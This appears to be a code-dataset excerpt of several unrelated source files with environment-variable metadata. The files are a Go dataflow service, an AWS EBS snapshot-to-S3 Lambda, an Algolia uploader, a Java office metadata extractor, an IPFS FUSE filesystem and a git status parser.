err := fillReqConnector(&srcConn, in.Plan.SourceConn)
if err == nil {
pl.SourceConn = srcConn
		} else {
return err
}
	} else {
out.Err = "Get source connector failed."
return errors.New("Invalid source connector.")
}
if in.Plan.GetDestConn() != nil {
destConn := _type.Connector{StorType:in.Plan.DestConn.StorType}
err := fillReqConnector(&destConn, in.Plan.DestConn)
if err == nil {
pl.DestConn = destConn
		} else {
out.Err = err.Error()
return err
}
	} else {
out.Err = "Get destination connector failed."
return errors.New("Invalid destination connector.")
}
if in.Plan.GetFilt() != nil {
if in.Plan.Filt.Prefix != "" {
pl.Filt = _type.Filter{Prefix:in.Plan.Filt.Prefix}
}
if len(in.Plan.Filt.Tag) > 0 {
for j := 0; j < len(in.Plan.Filt.Tag); j++ {
pl.Filt.Tag = append(pl.Filt.Tag, _type.KeyValue{Key:in.Plan.Filt.Tag[j].Key, Value:in.Plan.Filt.Tag[j].Value})
}
}
	} else {
pl.Filt = _type.Filter{Prefix:"/"} //this is default
}
if pl.Name == "" || pl.Type == "" {
out.Err = "Name or type is null."
return errors.New("Name or type is null.")
}
//rsp := pb.CreatePolicyResponse{}
log.Logf("plan:%+v\n", pl)
err := plan.Create(&pl, b.datamoverClient)
if err == nil {
out.Err = ""
out.PlanId = string(pl.Id.Hex())
	} else {
out.Err = err.Error()
}
log.Logf("Create plan err:%s.", out.Err)
return err
}
func (b *dataflowService) DeletePlan(ctx context.Context, in *pb.DeletePlanRequest, out *pb.DeletePlanResponse) error {
log.Log("Delete plan is called in dataflow service.")
//out.Id = "c506cd4b-9048-43bc-97ef-0d7dec369b42"
//out.Name = "GetPolicy." + in.Id
id := in.GetId()
if id == "" {
out.Err = "Get id failed."
return errors.New("Get id failed.")
}
//TODO: how to get tenant
//tenant := in.Tenant
tenant := "tenant"
err := plan.Delete(id, tenant)
if err == nil {
out.Err = ""
	} else {
out.Err = err.Error()
}
log.Logf("Delete plan err:%s.", out.Err)
return err
}
func (b *dataflowService) UpdatePlan(ctx context.Context, in *pb.UpdatePlanRequest, out *pb.UpdatePlanResponse) error {
log.Log("Update plan is called in dataflow service.")
pl := _type.Plan{}
if in.Plan.GetId() == "" {
out.Err = "No id provided."
return errors.New("No id provided.")
}
	if !bson.IsObjectIdHex(in.Plan.GetId()) {
		out.Err = "Invalid id."
		return errors.New("Invalid id.")
	}
	pl.Id = bson.ObjectIdHex(in.Plan.GetId())
pl.Name = in.Plan.GetName()
pl.Description = in.Plan.GetDescription()
pl.Type = in.Plan.GetType()
pl.OverWrite = in.Plan.GetOverWrite()
pl.RemainSource = in.Plan.GetRemainSource()
pl.PolicyId = in.Plan.GetPolicyId()
//TODO:how to get tenant
//pl.Tenant = in.Plan.GetTenant()
pl.Tenant = "tenant"
	if in.Plan.GetSourceConn() != nil {
		srcConn := _type.Connector{StorType:in.Plan.SourceConn.StorType}
		if err := fillReqConnector(&srcConn, in.Plan.SourceConn); err != nil {
			out.Err = err.Error()
			return err
		}
		pl.SourceConn = srcConn
	}
	if in.Plan.GetDestConn() != nil {
		destConn := _type.Connector{StorType:in.Plan.DestConn.StorType}
		if err := fillReqConnector(&destConn, in.Plan.DestConn); err != nil {
			out.Err = err.Error()
			return err
		}
		pl.DestConn = destConn
	}
if in.Plan.GetFilt() != nil {
if in.Plan.Filt.Prefix != "" {
pl.Filt = _type.Filter{Prefix:in.Plan.Filt.Prefix}
}
if len(in.Plan.Filt.Tag) > 0 {
for j := 0; j < len(in.Plan.Filt.Tag); j++ {
pl.Filt.Tag = append(pl.Filt.Tag, _type.KeyValue{Key:in.Plan.Filt.Tag[j].Key, Value:in.Plan.Filt.Tag[j].Value})
}
}
}
//TODO: Check validation of input parameter
err := plan.Update(&pl, b.datamoverClient)
if err == nil {
out.Err = ""
out.PlanId = string(pl.Id.Hex())
	} else {
out.Err = err.Error()
}
log.Logf("Update plan finished, err:%s.", out.Err)
return err
}
func (b *dataflowService) RunPlan(ctx context.Context, in *pb.RunPlanRequest, out *pb.RunPlanResponse) error {
log.Log("Run plan is called in dataflow service.")
id := in.Id
//TODO: how to get tenant
//tenant := in.Tenant
tenant := "tenant"
jid, err := plan.Run(id, tenant, b.datamoverClient)
if err == nil {
out.JobId = string(jid.Hex())
out.Err = ""
	} else {
out.JobId = ""
out.Err = err.Error()
}
log.Logf("Run plan err:%d.", out.Err)
return err
}
func (b *dataflowService) GetJob(ctx context.Context, in *pb.GetJobRequest, out *pb.GetJobResponse) error {
log.Log("Get job is called in dataflow service.")
id := in.Id
if in.Id == "all" {
id = ""
}
//TODO: how to get tenant
//tenant := in.Tenant
tenant := "tenant"
	js, err := job.Get(id, tenant)
if err == nil {
out.Err = ""
	} else {
out.Err = err.Error()
}
log.Logf("Get job err:%d.", out.Err)
//log.Logf("Getpolicy err:%d\n", rsp.ErrCode)
if err == nil {
for i := 0; i < len(js); i++ {
//des := "Total Capacity:" + js[i].TotalCapacity + ", "
//TODO: need change according to real scenario
des := "for test"
job := pb.Job{Id:string(js[i].Id.Hex()), Type:js[i].Type, PlanName:js[i].PlanName, PlanId:js[i].PlanId,
Description:des, SourceLocation:js[i].SourceLocation, DestLocation:js[i].DestLocation,
CreateTime:js[i].CreateTime.Unix(), EndTime:js[i].EndTime.Unix()}
out.Jobs = append(out.Jobs, &job)
}
}
//For debug -- begin
jsons, errs := json.Marshal(out)
if errs != nil {
		log.Logf("%s", errs.Error())
	} else {
log.Logf("jsons1: %s.\n", jsons)
}
//For debug -- end
return err
}
| [
"\"DB_HOST\""
] | [] | [
"DB_HOST"
] | [] | ["DB_HOST"] | go | 1 | 0 | |
imager/imager.py | import base64
import boto3
import hashlib
import io
import json
import os
def handler(event, context):
snapid = event['event']['SnapshotID']
state = event['event']['State']
transitions = event['event']['Transitions']
limit = 'NO'
ebs_client = boto3.client('ebs')
s3_client = boto3.client('s3')
    while state:
        # 'START' means there is no pagination token yet; otherwise resume
        # from the token saved in the incoming event.
        if state == 'START':
            response = ebs_client.list_snapshot_blocks(
                SnapshotId = snapid
            )
        else:
            response = ebs_client.list_snapshot_blocks(
                SnapshotId = snapid,
                NextToken = state
            )
        for block in response['Blocks']:
            download = ebs_client.get_snapshot_block(
                SnapshotId = snapid,
                BlockIndex = block['BlockIndex'],
                BlockToken = block['BlockToken']
            )
            sha256_hash = hashlib.sha256()
            with io.FileIO('/tmp/' + snapid + '.tmp', 'wb') as f:
                for b in download['BlockData']:
                    sha256_hash.update(b)
                    f.write(b)
            # EBS returns the block checksum as base64-encoded SHA-256 bytes.
            sha256_value = base64.b64decode(download['Checksum'])
            if sha256_value.hex() == sha256_hash.hexdigest():
                fname = str(block['BlockIndex']).zfill(10) + '_' + snapid + '_' + sha256_hash.hexdigest() + '_' + str(response['VolumeSize']) + '_' + str(response['BlockSize'])
                s3_client.upload_file('/tmp/' + snapid + '.tmp', os.environ['BUCKET_NAME'], snapid + '/' + fname)
            else:
                # Checksum mismatch: keep the block, but quarantine it under error/.
                fname = str(block['BlockIndex']).zfill(10) + '_' + snapid + '_' + sha256_value.hex() + '_' + str(response['VolumeSize']) + '_' + str(response['BlockSize'])
                s3_client.upload_file('/tmp/' + snapid + '.tmp', os.environ['BUCKET_NAME'], 'error/' + snapid + '/' + fname)
        state = response.get('NextToken', '')
        status = 'CONTINUE' if state else 'SUCCEEDED'
        transitions += 1
        if transitions == 2500 and state:
            # Close to the Step Functions transition budget with more blocks
            # remaining: stop here so the hand-off below starts a fresh
            # execution from the saved pagination state.
            limit = 'YES'
            transitions = 0
            break
event = {}
event['SnapshotID'] = snapid
event['State'] = state
event['Transitions'] = transitions
if limit == 'YES':
ssm_client = boto3.client('ssm')
response = ssm_client.get_parameter(
Name = os.environ['IMAGE_FUNCTION']
)
step_function = response['Parameter']['Value']
sfn_client = boto3.client('stepfunctions')
sfn_client.start_execution(
stateMachineArn = step_function,
input = json.dumps(event)
)
status = 'SUCCEEDED'
return {
'event': event,
'status': status,
} | [] | [] | [
"IMAGE_FUNCTION",
"BUCKET_NAME"
] | [] | ["IMAGE_FUNCTION", "BUCKET_NAME"] | python | 2 | 0 | |
src/main/java/sds/officeprocessor/commandhandlers/ExtractMetaProcessor.java | package sds.officeprocessor.commandhandlers;
import sds.officeprocessor.domain.events.ConvertToPdfFailed;
import java.io.IOException;
import java.time.LocalDateTime;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Component;
import com.npspot.jtransitlight.JTransitLightException;
import com.npspot.jtransitlight.consumer.ReceiverBusControl;
import com.npspot.jtransitlight.publisher.IBusControl;
import com.sds.storage.BlobInfo;
import com.sds.storage.BlobStorage;
import com.sds.storage.Guid;
import java.io.File;
import java.io.InputStream;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.nio.file.StandardOpenOption;
import java.util.List;
import org.apache.commons.io.FilenameUtils;
import sds.messaging.callback.AbstractMessageProcessor;
import sds.officeprocessor.domain.commands.ExtractMeta;
import sds.officeprocessor.domain.events.MetaExtracted;
import sds.officeprocessor.domain.models.Property;
import sds.officeprocessor.metaextractors.DocMetaExtractor;
import sds.officeprocessor.metaextractors.ExcelMetaExtractor;
import sds.officeprocessor.metaextractors.IMetaExtractor;
import sds.officeprocessor.metaextractors.PresentationMetaExtractor;
@Component
public class ExtractMetaProcessor extends AbstractMessageProcessor<ExtractMeta> {
private static final Logger LOGGER = LoggerFactory.getLogger(ExtractMetaProcessor.class);
ReceiverBusControl receiver;
IBusControl bus;
BlobStorage storage;
@Autowired
public ExtractMetaProcessor(ReceiverBusControl receiver, IBusControl bus,
BlobStorage storage) throws JTransitLightException, IOException {
this.bus = bus;
this.receiver = receiver;
this.storage = storage;
}
public void process(ExtractMeta message) {
try {
BlobInfo blob = storage.getFileInfo(new Guid(message.getBlobId()), message.getBucket());
List<Property> meta = null;
IMetaExtractor extractor = null;
File directory = new File(System.getenv("OSDR_TEMP_FILES_FOLDER"));
File tempFile = File.createTempFile("temp", ".tmp", directory);
try (InputStream fs = Files.newInputStream(Paths.get(tempFile.getCanonicalPath()), StandardOpenOption.DELETE_ON_CLOSE)) {
switch (FilenameUtils.getExtension(blob.getFileName()).toLowerCase()) {
case "doc":
case "docx":
case "odt":
extractor = new DocMetaExtractor();
meta = extractor.GetMeta(storage.getFileStream(new Guid(message.getBlobId()), message.getBucket()));
break;
case "xls":
case "xlsx":
case "ods":
extractor = new ExcelMetaExtractor();
meta = extractor.GetMeta(storage.getFileStream(new Guid(message.getBlobId()), message.getBucket()));
break;
case "ppt":
case "pptx":
case "odp":
extractor = new PresentationMetaExtractor();
meta = extractor.GetMeta(storage.getFileStream(new Guid(message.getBlobId()), message.getBucket()));
break;
default:
ConvertToPdfFailed convertToPdfFailed = new ConvertToPdfFailed();
convertToPdfFailed.setId(message.getId());
convertToPdfFailed.setMessage(String.format("Cannot find file converter for %s.", blob.getFileName()));
convertToPdfFailed.setCorrelationId(message.getCorrelationId());
convertToPdfFailed.setUserId(message.getUserId());
convertToPdfFailed.setTimeStamp(getTimestamp());
bus.publish(convertToPdfFailed);
return;
}
if (meta != null) {
MetaExtracted metaExtracted = new MetaExtracted();
metaExtracted.setMeta(meta);
metaExtracted.setCorrelationId(message.getCorrelationId());
metaExtracted.setTimeStamp(getTimestamp());
metaExtracted.setUserId(message.getUserId());
metaExtracted.setId(message.getId());
metaExtracted.setBlobId(message.getBlobId());
metaExtracted.setBucket(message.getBucket());
bus.publish(metaExtracted);
}
}
} catch (IOException ex) {
ConvertToPdfFailed convertToPdfFailed = new ConvertToPdfFailed();
convertToPdfFailed.setId(message.getId());
convertToPdfFailed.setMessage("Cannot convert file to pdf from bucket " + message.getBucket() + " with Id " + message.getBlobId() + ". Error: " + ex.getMessage());
convertToPdfFailed.setCorrelationId(message.getCorrelationId());
convertToPdfFailed.setUserId(message.getUserId());
convertToPdfFailed.setTimeStamp(getTimestamp());
bus.publish(convertToPdfFailed);
}
}
    private String getTimestamp() {
        // LocalDateTime.now().toString() yields ISO-8601 without a zone suffix
        // (e.g. 2018-03-11T03:00:00.123), not "yyyy-MM-dd'T'HH:mm:ss'Z'".
        return LocalDateTime.now().toString();
    }
}
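// A sketch of how a further format could be wired into the extension switch in
// process() above, assuming a hypothetical TextMetaExtractor that implements
// IMetaExtractor (not part of this codebase):
//
//     case "txt":
//         extractor = new TextMetaExtractor();
//         meta = extractor.GetMeta(storage.getFileStream(new Guid(message.getBlobId()), message.getBucket()));
//         break;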
| [
"\"OSDR_TEMP_FILES_FOLDER\""
] | [] | [
"OSDR_TEMP_FILES_FOLDER"
] | [] | ["OSDR_TEMP_FILES_FOLDER"] | java | 1 | 0 | |
algolia.py | import os
import csv
from algoliasearch.search_client import SearchClient
client = SearchClient.create("08KMSERF1B", str(os.environ.get("KEY")))
index = client.init_index("Project")
def add_records(filename: str):
with open(filename, newline="") as f:
csv_r = list(csv.DictReader(f, delimiter=";"))
len_idx = index.search("")["nbHits"]
if len(csv_r) > len_idx:
index.save_objects(
csv_r[len_idx:], {"autoGenerateObjectIDIfNotExist": "true"}
)
print(f"{len(csv_r[len_idx:]) - 1} new records added.")
return
print("Nothing new.")
if __name__ == "__main__":
add_records("projects.csv")
| [] | [] | [
"KEY"
] | [] | ["KEY"] | python | 1 | 0 | |
fuse/ipns/ipns_unix.go | // +build !nofuse
// package fuse/ipns implements a fuse filesystem that interfaces
// with ipns, the naming system for ipfs.
package ipns
import (
"context"
"errors"
"fmt"
"io"
"os"
core "github.com/ipfs/go-ipfs/core"
dag "github.com/ipfs/go-ipfs/merkledag"
mfs "github.com/ipfs/go-ipfs/mfs"
namesys "github.com/ipfs/go-ipfs/namesys"
path "github.com/ipfs/go-ipfs/path"
ft "github.com/ipfs/go-ipfs/unixfs"
fuse "gx/ipfs/QmSJBsmLP1XMjv8hxYg2rUMdPDB7YUpyBo9idjrJ6Cmq6F/fuse"
fs "gx/ipfs/QmSJBsmLP1XMjv8hxYg2rUMdPDB7YUpyBo9idjrJ6Cmq6F/fuse/fs"
peer "gx/ipfs/QmVf8hTAsLLFtn4WPCRNdnaF2Eag2qTBS6uR8AiHPZARXy/go-libp2p-peer"
cid "gx/ipfs/QmapdYm1b22Frv3k17fqrBYTFRxwiaVJkB299Mfn33edeB/go-cid"
logging "gx/ipfs/Qmbi1CTJsbnBZjCEgc2otwu8cUFPsGpzWXG7edVCLZ7Gvk/go-log"
ci "gx/ipfs/Qme1knMqwt1hKZbc1BmQFmnm9f36nyQGwXxPGVpVJ9rMK5/go-libp2p-crypto"
)
func init() {
if os.Getenv("IPFS_FUSE_DEBUG") != "" {
fuse.Debug = func(msg interface{}) {
fmt.Println(msg)
}
}
}
var log = logging.Logger("fuse/ipns")
// FileSystem is the readwrite IPNS Fuse Filesystem.
type FileSystem struct {
Ipfs *core.IpfsNode
RootNode *Root
}
// NewFileSystem constructs new fs using given core.IpfsNode instance.
func NewFileSystem(ipfs *core.IpfsNode, sk ci.PrivKey, ipfspath, ipnspath string) (*FileSystem, error) {
kmap := map[string]ci.PrivKey{
"local": sk,
}
root, err := CreateRoot(ipfs, kmap, ipfspath, ipnspath)
if err != nil {
return nil, err
}
return &FileSystem{Ipfs: ipfs, RootNode: root}, nil
}
// Root constructs the Root of the filesystem, a Root object.
func (f *FileSystem) Root() (fs.Node, error) {
log.Debug("filesystem, get root")
return f.RootNode, nil
}
func (f *FileSystem) Destroy() {
err := f.RootNode.Close()
if err != nil {
log.Errorf("Error Shutting Down Filesystem: %s\n", err)
}
}
// Root is the root object of the filesystem tree.
type Root struct {
Ipfs *core.IpfsNode
Keys map[string]ci.PrivKey
// Used for symlinking into ipfs
IpfsRoot string
IpnsRoot string
LocalDirs map[string]fs.Node
Roots map[string]*keyRoot
LocalLinks map[string]*Link
}
func ipnsPubFunc(ipfs *core.IpfsNode, k ci.PrivKey) mfs.PubFunc {
return func(ctx context.Context, c *cid.Cid) error {
return ipfs.Namesys.Publish(ctx, k, path.FromCid(c))
}
}
func loadRoot(ctx context.Context, rt *keyRoot, ipfs *core.IpfsNode, name string) (fs.Node, error) {
p, err := path.ParsePath("/ipns/" + name)
if err != nil {
log.Errorf("mkpath %s: %s", name, err)
return nil, err
}
node, err := core.Resolve(ctx, ipfs.Namesys, ipfs.Resolver, p)
switch err {
case nil:
case namesys.ErrResolveFailed:
node = ft.EmptyDirNode()
default:
log.Errorf("looking up %s: %s", p, err)
return nil, err
}
pbnode, ok := node.(*dag.ProtoNode)
if !ok {
return nil, dag.ErrNotProtobuf
}
root, err := mfs.NewRoot(ctx, ipfs.DAG, pbnode, ipnsPubFunc(ipfs, rt.k))
if err != nil {
return nil, err
}
rt.root = root
switch val := root.GetValue().(type) {
case *mfs.Directory:
return &Directory{dir: val}, nil
case *mfs.File:
return &FileNode{fi: val}, nil
default:
return nil, errors.New("unrecognized type")
}
}
type keyRoot struct {
k ci.PrivKey
alias string
root *mfs.Root
}
func CreateRoot(ipfs *core.IpfsNode, keys map[string]ci.PrivKey, ipfspath, ipnspath string) (*Root, error) {
ldirs := make(map[string]fs.Node)
roots := make(map[string]*keyRoot)
links := make(map[string]*Link)
for alias, k := range keys {
pid, err := peer.IDFromPrivateKey(k)
if err != nil {
return nil, err
}
name := pid.Pretty()
kr := &keyRoot{k: k, alias: alias}
fsn, err := loadRoot(ipfs.Context(), kr, ipfs, name)
if err != nil {
return nil, err
}
roots[name] = kr
ldirs[name] = fsn
// set up alias symlink
links[alias] = &Link{
Target: name,
}
}
return &Root{
Ipfs: ipfs,
IpfsRoot: ipfspath,
IpnsRoot: ipnspath,
Keys: keys,
LocalDirs: ldirs,
LocalLinks: links,
Roots: roots,
}, nil
}
// Attr returns file attributes.
func (*Root) Attr(ctx context.Context, a *fuse.Attr) error {
log.Debug("Root Attr")
	a.Mode = os.ModeDir | 0111 // --x--x--x: traverse (search) permission only
return nil
}
// Lookup performs a lookup under this node.
func (s *Root) Lookup(ctx context.Context, name string) (fs.Node, error) {
switch name {
case "mach_kernel", ".hidden", "._.":
// Just quiet some log noise on OS X.
return nil, fuse.ENOENT
}
if lnk, ok := s.LocalLinks[name]; ok {
return lnk, nil
}
nd, ok := s.LocalDirs[name]
if ok {
switch nd := nd.(type) {
case *Directory:
return nd, nil
case *FileNode:
return nd, nil
default:
return nil, fuse.EIO
}
}
// other links go through ipns resolution and are symlinked into the ipfs mountpoint
resolved, err := s.Ipfs.Namesys.Resolve(s.Ipfs.Context(), name)
if err != nil {
log.Warningf("ipns: namesys resolve error: %s", err)
return nil, fuse.ENOENT
}
segments := resolved.Segments()
if segments[0] == "ipfs" {
p := path.Join(resolved.Segments()[1:])
return &Link{s.IpfsRoot + "/" + p}, nil
}
log.Error("Invalid path.Path: ", resolved)
return nil, errors.New("invalid path from ipns record")
}
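// Lookup of a non-local name therefore resolves through IPNS and is exposed as
// a symlink into the sibling /ipfs mountpoint (e.g. <IpfsRoot>/Qm.../docs; the
// concrete path is illustrative), so the kernel follows the link from there.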
func (r *Root) Close() error {
for _, mr := range r.Roots {
err := mr.root.Close()
if err != nil {
return err
}
}
return nil
}
// Forget is called when the filesystem is unmounted. probably.
// see comments here: http://godoc.org/bazil.org/fuse/fs#FSDestroyer
func (r *Root) Forget() {
err := r.Close()
if err != nil {
log.Error(err)
}
}
// ReadDirAll reads a particular directory. Will show locally available keys
// as well as a symlink to the peerID key
func (r *Root) ReadDirAll(ctx context.Context) ([]fuse.Dirent, error) {
log.Debug("Root ReadDirAll")
var listing []fuse.Dirent
for alias, k := range r.Keys {
pid, err := peer.IDFromPrivateKey(k)
if err != nil {
continue
}
ent := fuse.Dirent{
Name: pid.Pretty(),
Type: fuse.DT_Dir,
}
link := fuse.Dirent{
Name: alias,
Type: fuse.DT_Link,
}
listing = append(listing, ent, link)
}
return listing, nil
}
// Directory is wrapper over an mfs directory to satisfy the fuse fs interface
type Directory struct {
dir *mfs.Directory
}
type FileNode struct {
fi *mfs.File
}
// File is wrapper over an mfs file to satisfy the fuse fs interface
type File struct {
fi mfs.FileDescriptor
}
// Attr returns the attributes of a given node.
func (d *Directory) Attr(ctx context.Context, a *fuse.Attr) error {
log.Debug("Directory Attr")
a.Mode = os.ModeDir | 0555
a.Uid = uint32(os.Getuid())
a.Gid = uint32(os.Getgid())
return nil
}
// Attr returns the attributes of a given node.
func (fi *FileNode) Attr(ctx context.Context, a *fuse.Attr) error {
log.Debug("File Attr")
size, err := fi.fi.Size()
if err != nil {
// In this case, the dag node in question may not be unixfs
return fmt.Errorf("fuse/ipns: failed to get file.Size(): %s", err)
}
a.Mode = os.FileMode(0666)
a.Size = uint64(size)
a.Uid = uint32(os.Getuid())
a.Gid = uint32(os.Getgid())
return nil
}
// Lookup performs a lookup under this node.
func (s *Directory) Lookup(ctx context.Context, name string) (fs.Node, error) {
child, err := s.dir.Child(name)
if err != nil {
// todo: make this error more versatile.
return nil, fuse.ENOENT
}
switch child := child.(type) {
case *mfs.Directory:
return &Directory{dir: child}, nil
case *mfs.File:
return &FileNode{fi: child}, nil
default:
// NB: if this happens, we do not want to continue, unpredictable behaviour
// may occur.
panic("invalid type found under directory. programmer error.")
}
}
// ReadDirAll reads the link structure as directory entries
func (dir *Directory) ReadDirAll(ctx context.Context) ([]fuse.Dirent, error) {
var entries []fuse.Dirent
listing, err := dir.dir.List(ctx)
if err != nil {
return nil, err
}
for _, entry := range listing {
dirent := fuse.Dirent{Name: entry.Name}
switch mfs.NodeType(entry.Type) {
case mfs.TDir:
dirent.Type = fuse.DT_Dir
case mfs.TFile:
dirent.Type = fuse.DT_File
}
entries = append(entries, dirent)
}
if len(entries) > 0 {
return entries, nil
}
return nil, fuse.ENOENT
}
func (fi *File) Read(ctx context.Context, req *fuse.ReadRequest, resp *fuse.ReadResponse) error {
_, err := fi.fi.Seek(req.Offset, io.SeekStart)
if err != nil {
return err
}
fisize, err := fi.fi.Size()
if err != nil {
return err
}
select {
case <-ctx.Done():
return ctx.Err()
default:
}
readsize := min(req.Size, int(fisize-req.Offset))
n, err := fi.fi.CtxReadFull(ctx, resp.Data[:readsize])
resp.Data = resp.Data[:n]
return err
}
func (fi *File) Write(ctx context.Context, req *fuse.WriteRequest, resp *fuse.WriteResponse) error {
// TODO: at some point, ensure that WriteAt here respects the context
wrote, err := fi.fi.WriteAt(req.Data, req.Offset)
if err != nil {
return err
}
resp.Size = wrote
return nil
}
func (fi *File) Flush(ctx context.Context, req *fuse.FlushRequest) error {
errs := make(chan error, 1)
go func() {
errs <- fi.fi.Flush()
}()
select {
case err := <-errs:
return err
case <-ctx.Done():
return ctx.Err()
}
}
func (fi *File) Setattr(ctx context.Context, req *fuse.SetattrRequest, resp *fuse.SetattrResponse) error {
if req.Valid.Size() {
cursize, err := fi.fi.Size()
if err != nil {
return err
}
if cursize != int64(req.Size) {
err := fi.fi.Truncate(int64(req.Size))
if err != nil {
return err
}
}
}
return nil
}
// Fsync flushes the content in the file to disk, but does not
// update the dag tree internally
func (fi *FileNode) Fsync(ctx context.Context, req *fuse.FsyncRequest) error {
errs := make(chan error, 1)
go func() {
errs <- fi.fi.Sync()
}()
select {
case err := <-errs:
return err
case <-ctx.Done():
return ctx.Err()
}
}
func (fi *File) Forget() {
err := fi.fi.Sync()
if err != nil {
log.Debug("forget file error: ", err)
}
}
func (dir *Directory) Mkdir(ctx context.Context, req *fuse.MkdirRequest) (fs.Node, error) {
child, err := dir.dir.Mkdir(req.Name)
if err != nil {
return nil, err
}
return &Directory{dir: child}, nil
}
func (fi *FileNode) Open(ctx context.Context, req *fuse.OpenRequest, resp *fuse.OpenResponse) (fs.Handle, error) {
var mfsflag int
switch {
case req.Flags.IsReadOnly():
mfsflag = mfs.OpenReadOnly
case req.Flags.IsWriteOnly():
mfsflag = mfs.OpenWriteOnly
case req.Flags.IsReadWrite():
mfsflag = mfs.OpenReadWrite
default:
return nil, errors.New("unsupported flag type")
}
fd, err := fi.fi.Open(mfsflag, true)
if err != nil {
return nil, err
}
if req.Flags&fuse.OpenTruncate != 0 {
if req.Flags.IsReadOnly() {
log.Error("tried to open a readonly file with truncate")
return nil, fuse.ENOTSUP
}
log.Info("Need to truncate file!")
err := fd.Truncate(0)
if err != nil {
return nil, err
}
} else if req.Flags&fuse.OpenAppend != 0 {
log.Info("Need to append to file!")
if req.Flags.IsReadOnly() {
log.Error("tried to open a readonly file with append")
return nil, fuse.ENOTSUP
}
_, err := fd.Seek(0, io.SeekEnd)
if err != nil {
log.Error("seek reset failed: ", err)
return nil, err
}
}
return &File{fi: fd}, nil
}
func (fi *File) Release(ctx context.Context, req *fuse.ReleaseRequest) error {
return fi.fi.Close()
}
func (dir *Directory) Create(ctx context.Context, req *fuse.CreateRequest, resp *fuse.CreateResponse) (fs.Node, fs.Handle, error) {
// New 'empty' file
nd := dag.NodeWithData(ft.FilePBData(nil, 0))
err := dir.dir.AddChild(req.Name, nd)
if err != nil {
return nil, nil, err
}
child, err := dir.dir.Child(req.Name)
if err != nil {
return nil, nil, err
}
fi, ok := child.(*mfs.File)
if !ok {
return nil, nil, errors.New("child creation failed")
}
nodechild := &FileNode{fi: fi}
var openflag int
switch {
case req.Flags.IsReadOnly():
openflag = mfs.OpenReadOnly
case req.Flags.IsWriteOnly():
openflag = mfs.OpenWriteOnly
case req.Flags.IsReadWrite():
openflag = mfs.OpenReadWrite
default:
return nil, nil, errors.New("unsupported open mode")
}
fd, err := fi.Open(openflag, true)
if err != nil {
return nil, nil, err
}
return nodechild, &File{fi: fd}, nil
}
func (dir *Directory) Remove(ctx context.Context, req *fuse.RemoveRequest) error {
err := dir.dir.Unlink(req.Name)
if err != nil {
return fuse.ENOENT
}
return nil
}
// Rename implements NodeRenamer
func (dir *Directory) Rename(ctx context.Context, req *fuse.RenameRequest, newDir fs.Node) error {
cur, err := dir.dir.Child(req.OldName)
if err != nil {
return err
}
err = dir.dir.Unlink(req.OldName)
if err != nil {
return err
}
switch newDir := newDir.(type) {
case *Directory:
nd, err := cur.GetNode()
if err != nil {
return err
}
err = newDir.dir.AddChild(req.NewName, nd)
if err != nil {
return err
}
case *FileNode:
log.Error("Cannot move node into a file!")
return fuse.EPERM
default:
log.Error("Unknown node type for rename target dir!")
return errors.New("unknown fs node type")
}
return nil
}
func min(a, b int) int {
if a < b {
return a
}
return b
}
// to check that out Node implements all the interfaces we want
type ipnsRoot interface {
fs.Node
fs.HandleReadDirAller
fs.NodeStringLookuper
}
var _ ipnsRoot = (*Root)(nil)
type ipnsDirectory interface {
fs.HandleReadDirAller
fs.Node
fs.NodeCreater
fs.NodeMkdirer
fs.NodeRemover
fs.NodeRenamer
fs.NodeStringLookuper
}
var _ ipnsDirectory = (*Directory)(nil)
type ipnsFile interface {
fs.HandleFlusher
fs.HandleReader
fs.HandleWriter
fs.HandleReleaser
}
type ipnsFileNode interface {
fs.Node
fs.NodeFsyncer
fs.NodeOpener
}
var _ ipnsFileNode = (*FileNode)(nil)
var _ ipnsFile = (*File)(nil)
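// The blank-identifier assignments above are Go's standard compile-time
// interface checks: assigning a typed nil pointer to an interface-typed
// variable fails the build as soon as the type stops satisfying the
// interface. A minimal illustration (fmt.Stringer and myType are only for
// the example):
//
//	type myType struct{}
//	func (myType) String() string { return "x" }
//	var _ fmt.Stringer = (*myType)(nil) // compile error if String is removed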
| [
"\"IPFS_FUSE_DEBUG\""
] | [] | [
"IPFS_FUSE_DEBUG"
] | [] | ["IPFS_FUSE_DEBUG"] | go | 1 | 0 | |
pkg/true_git/status/status.go | package status
import (
"bufio"
"context"
"fmt"
"os"
"os/exec"
"strings"
"github.com/werf/logboek"
"github.com/werf/logboek/pkg/types"
"github.com/werf/werf/pkg/true_git"
)
// Status returns a Result with the path lists of untracked files and of files
// modified in the index and in the worktree.
// Every status other than Unmodified or Untracked is counted as Modified
// (i.e. A, D and U are folded into M).
// Ignored, renamed and copied files are not handled (renames are disabled with --no-renames).
func Status(ctx context.Context, workTreeDir string) (r Result, err error) {
logboek.Context(ctx).Debug().
LogProcess("Status %s", workTreeDir).
Options(func(options types.LogProcessOptionsInterface) {
if !debug() {
options.Mute()
}
}).
Do(func() {
r, err = status(ctx, workTreeDir)
if debug() {
logboek.Context(ctx).Debug().LogF("result: %+v\n", r)
logboek.Context(ctx).Debug().LogLn("err:", err)
}
})
return
}
func status(ctx context.Context, workTreeDir string) (Result, error) {
result := Result{}
args := append([]string{}, "-c", "core.quotePath=false", "status", "--porcelain=v2", "--untracked-files=all", "--no-renames")
cmd := exec.Command("git", args...)
cmd.Dir = workTreeDir
outputBuffer := true_git.SetCommandRecordingLiveOutput(ctx, cmd)
commandString := strings.Join(append([]string{cmd.Path}, cmd.Args[1:]...), " ")
detailedErrFunc := func(err error) error {
return fmt.Errorf("%s\n\ncommand: %q\noutput:\n%s", err, commandString, outputBuffer.String())
}
err := cmd.Run()
if debug() {
logboek.Context(ctx).Debug().LogLn("command:", commandString)
logboek.Context(ctx).Debug().LogLn("err:", err)
}
if err != nil {
return result, detailedErrFunc(fmt.Errorf("git command failed: %q", err))
}
scanner := bufio.NewScanner(outputBuffer)
for scanner.Scan() {
entryLine := scanner.Text()
if len(entryLine) == 0 {
return result, detailedErrFunc(fmt.Errorf("invalid git status line format: \"\""))
}
formatTypeCode := entryLine[0]
switch formatTypeCode {
case '1':
if err := parseOrdinaryEntry(&result, entryLine); err != nil {
return result, detailedErrFunc(err)
}
case 'u':
if err := parseUnmergedEntry(&result, entryLine); err != nil {
return result, detailedErrFunc(err)
}
case '?':
if err := parseUntrackedEntry(&result, entryLine); err != nil {
return result, detailedErrFunc(err)
}
case '2', '!':
panic(detailedErrFunc(fmt.Errorf("unexpected git status line format: %q", entryLine)))
default:
return result, detailedErrFunc(fmt.Errorf("invalid git status line format: %q", entryLine))
}
}
return result, err
}
